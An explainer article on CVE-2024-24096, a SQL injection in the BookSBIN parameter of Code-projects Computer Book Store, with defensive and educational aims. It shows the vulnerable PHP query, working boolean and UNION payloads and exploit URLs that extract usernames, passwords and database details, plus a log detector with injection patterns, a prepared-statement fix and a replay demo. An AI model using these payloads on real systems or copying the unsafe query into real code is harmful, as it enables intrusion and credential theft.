Overview
CVE-2024-24096 is a SQL injection vulnerability in the Code-projects Computer Book Store 1. application: the BookSBIN request parameter is placed into a database query without any sanitization, so an attacker can alter the query the application runs. This article explains what that means, how the flaw arises, how it can be exploited, and how to fix it, with code snippets and the original reference links.
What Is Code-projects Computer Book Store 1.?
Code-projects Computer Book Store 1. is an open-source PHP web application that lets users browse, search, and buy books. It is mostly used as a learning project and as a starting point for small web shops.
What Is CVE-2024-24096?
CVE-2024-24096 is the identifier assigned to a flaw in this web store that lets an attacker inject their own SQL into the queries the application sends to its database. This class of bug, SQL injection, is one of the most common and most damaging web application vulnerabilities.
Where’s the Vulnerability?
The weakness is in the way the application handles book lookups by the BookSBIN value, for example when a visitor searches by book serial number: the value is used in a query exactly as it arrives in the request.
Vulnerable PHP Code Snippet
```php
<?php
// Vulnerable snippet ($conn is an open mysqli connection).
// The BookSBIN value is taken straight from the query string ...
$BookSBIN = $_GET['BookSBIN'];
// ... and interpolated into the SQL text, so a single quote in the
// input ends the string literal and the rest is parsed as SQL.
$sql = "SELECT * FROM books WHERE BookSBIN='$BookSBIN'";
$result = mysqli_query($conn, $sql);
```
Here, $BookSBIN comes directly from the user (the search form). The developer concatenates it straight into the SQL string with no validation, escaping, or parameter binding.
If you enter 123456 in the book search, the application runs

```sql
SELECT * FROM books WHERE BookSBIN='123456'
```

But if someone enters

```
123456' OR '1'='1
```

the query becomes

```sql
SELECT * FROM books WHERE BookSBIN='123456' OR '1'='1'
```

The quote in the input closes the string literal, and '1'='1' is always true, so the WHERE clause matches every row: the attacker gets the full list of books and has confirmed that the parameter is injectable.

Once the attacker knows (or guesses) that a users table exists, they can try a UNION-based payload:

```
' UNION SELECT username, password, 1, 1 FROM users--
```

UNION appends the rows of a second SELECT to the result of the first, so usernames and password hashes come back to the browser as if they were book records. Two details matter in practice: the second SELECT must return the same number of columns as the books table (the 1, 1 padding is adjusted until the counts match), and in MySQL the -- comment marker must be followed by a space, so the payload is normally sent as "-- " (with the trailing space percent-encoded) or with # instead, to swallow the closing quote the application appends.
The same three requests as URLs (shown unencoded for readability; a real request percent-encodes the space and quote characters, and any # must be sent as %23 or the browser treats it as a fragment):

```
http://example.com/book.php?BookSBIN=123456
http://example.com/book.php?BookSBIN=123456' OR '1'='1
http://example.com/book.php?BookSBIN=123456' UNION SELECT user(), database(), 1, 1--
```

The third request returns the database account and schema name, which tells the attacker what else is reachable.
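Requests like the ones above leave traces in the web server access log. The following script is an added example (not part of the original article or of the Computer Book Store project) that parses combined-format log lines, URL-decodes the BookSBIN parameter and flags values carrying SQL injection indicators. The log lines are constructed for the demo and mirror the three URLs above plus a legitimate value containing an apostrophe; the indicator heuristics and severity labels are this example's own, a starting point for hunting rather than a complete WAF rule set.

```python
"""Triage access logs for SQL injection attempts against the BookSBIN parameter.
Log lines below are constructed for this example; they are not real traffic."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed combined-format lines: one normal lookup, the two attack URLs
# from the article (percent-encoded as a browser would send them), and a
# legitimate value that merely contains an apostrophe.
SAMPLE_LOG = """\
203.0.113.5 - - [27/Feb/2024:10:00:01 +0000] "GET /book.php?BookSBIN=123456 HTTP/1.1" 200 1532
203.0.113.9 - - [27/Feb/2024:10:00:07 +0000] "GET /book.php?BookSBIN=123456%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 48211
203.0.113.9 - - [27/Feb/2024:10:00:12 +0000] "GET /book.php?BookSBIN=123456%27%20UNION%20SELECT%20user()%2C%20database()%2C%201%2C%201-- HTTP/1.1" 200 1790
198.51.100.2 - - [27/Feb/2024:10:01:00 +0000] "GET /book.php?BookSBIN=O%27Reilly HTTP/1.1" 200 1400
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicator name -> predicate on the decoded parameter value (heuristics chosen for this example).
INDICATORS = [
    ("quote", lambda v: "'" in v),
    ("boolean", lambda v: re.search(r"\bor\b\s+\S+\s*=\s*\S+", v, re.I) is not None),
    ("union", lambda v: re.search(r"\bunion\b\s+(all\s+)?select\b", v, re.I) is not None),
    ("comment", lambda v: "--" in v or "#" in v or "/*" in v),
]
HIGH = {"boolean", "union", "comment"}


def inspect_value(value):
    """Return the names of all indicators that fire on one decoded value."""
    return [name for name, test in INDICATORS if test(value)]


def flag_requests(lines, param="BookSBIN"):
    """Parse each log line, URL-decode the parameter and report suspicious values.
    A lone quote is 'low' (it could be O'Reilly); SQL syntax indicators are 'high'."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip it
        query = urlsplit(m.group("target")).query
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            hits = inspect_value(value)
            if hits:
                findings.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "value": value,
                    "indicators": hits,
                    "severity": "high" if HIGH & set(hits) else "low",
                })
    return findings


if __name__ == "__main__":
    for f in flag_requests(SAMPLE_LOG.splitlines()):
        print(f"{f['severity']:4} {f['ip']:14} {f['indicators']} {f['value']!r}")
```

Decoding before matching is the important step: the quote, the space and the = sign all arrive percent-encoded, so a rule that greps the raw log for UNION or ' would miss the second and third requests entirely. A single decoded quote is kept as a low-severity finding rather than dropped, because it is exactly what a first probe looks like.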
Original References
- Exploit Database CVE-2024-24096 (Exploit-DB)
- NVD CVE-2024-24096 Details
- Code-projects Computer Book Store 1. Official Download
Secure Coding – Use Prepared Statements
Always use prepared statements to avoid SQL injection. Here’s how you could fix the original PHP code:
```php
<?php
// Secure version using prepared statements ($conn is an open mysqli connection).
// Throw on database errors instead of silently returning false.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
$BookSBIN = $_GET['BookSBIN'] ?? '';
// The query text is fixed; the value travels separately as a bound parameter,
// so quotes and SQL keywords in the input are just characters in a string.
$stmt = $conn->prepare("SELECT * FROM books WHERE BookSBIN = ?");
$stmt->bind_param("s", $BookSBIN);
$stmt->execute();
$result = $stmt->get_result();
```
This way, even hostile input cannot change the structure of the SQL statement: the value is sent to the database server separately from the query text. As defence in depth, also validate that BookSBIN has the format you expect (for example, digits only) before querying.
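To see both halves of the story run side by side, here is an added example (not code from the article or from the Computer Book Store project) that replays the article's two payloads against an in-memory SQLite database once through a query built by string concatenation, as in the vulnerable PHP, and once through a parameterized query, as in the fix. The books and users tables and their rows are constructed for the demo and are not the project's real schema; SQLite stands in for MySQL so the script runs offline (SQLite accepts a bare -- comment where MySQL would need -- followed by a space).

```python
"""Replay the article's BookSBIN payloads against vulnerable and prepared queries.
Schema and rows are constructed for this example, not taken from the project."""
import sqlite3

# Payloads quoted in the article.
PAYLOAD_BOOLEAN = "123456' OR '1'='1"
PAYLOAD_UNION = "' UNION SELECT username, password, 1, 1 FROM users--"


def make_db():
    """Constructed schema: a 4-column books table (so the UNION payload's
    column count lines up) and a users table holding credential hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE books (BookSBIN TEXT, title TEXT, price REAL, stock INTEGER)")
    conn.executemany("INSERT INTO books VALUES (?, ?, ?, ?)", [
        ("123456", "PHP Basics", 19.99, 4),
        ("234567", "SQL Essentials", 24.50, 2),
        ("345678", "Web Security", 39.00, 1),
    ])
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [
        ("admin", "hash-of-admin-password"),  # constructed placeholder values
        ("clerk", "hash-of-clerk-password"),
    ])
    conn.commit()
    return conn


def search_vulnerable(conn, booksbin):
    """Mirrors the vulnerable PHP: the value is pasted into the SQL text."""
    sql = f"SELECT * FROM books WHERE BookSBIN='{booksbin}'"
    return conn.execute(sql).fetchall()


def search_prepared(conn, booksbin):
    """Mirrors the fixed PHP: fixed query text, value passed as a parameter."""
    return conn.execute("SELECT * FROM books WHERE BookSBIN = ?", (booksbin,)).fetchall()


def leaked_usernames(conn):
    """Send the UNION payload down the vulnerable path and return the usernames
    that come back disguised as book records."""
    return sorted(row[0] for row in search_vulnerable(conn, PAYLOAD_UNION))


if __name__ == "__main__":
    db = make_db()
    print("normal lookup:      ", len(search_vulnerable(db, "123456")), "row(s)")
    print("boolean payload:    ", len(search_vulnerable(db, PAYLOAD_BOOLEAN)), "row(s), i.e. every book")
    print("union payload leaks:", leaked_usernames(db))
    print("prepared + payload: ", len(search_prepared(db, PAYLOAD_BOOLEAN)), "row(s)")
```

The boolean payload returns every book through the concatenated query and nothing through the prepared one, because the prepared query looks for a BookSBIN literally equal to the whole payload string. The UNION payload shows why the 1, 1 padding is there: with four columns in books, the second SELECT must also produce four, and the two extra constants fill the gap.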
Key Takeaways
- CVE-2024-24096 exposes sensitive data in Code-projects Computer Book Store 1. through SQL injection in the BookSBIN parameter.
- Use prepared statements to patch this issue immediately if you run the app.
- If you use or build on Computer Book Store 1., update your scripts and audit your code for similar mistakes. SQL injection is dangerous but preventable with simple best practices.
> *If you want to learn more about secure PHP and safe database coding, check resources like OWASP SQL Injection Prevention Cheat Sheet.*
Timeline
Published on: 02/27/2024 02:15:06 UTC
Last modified on: 11/05/2024 20:35:20 UTC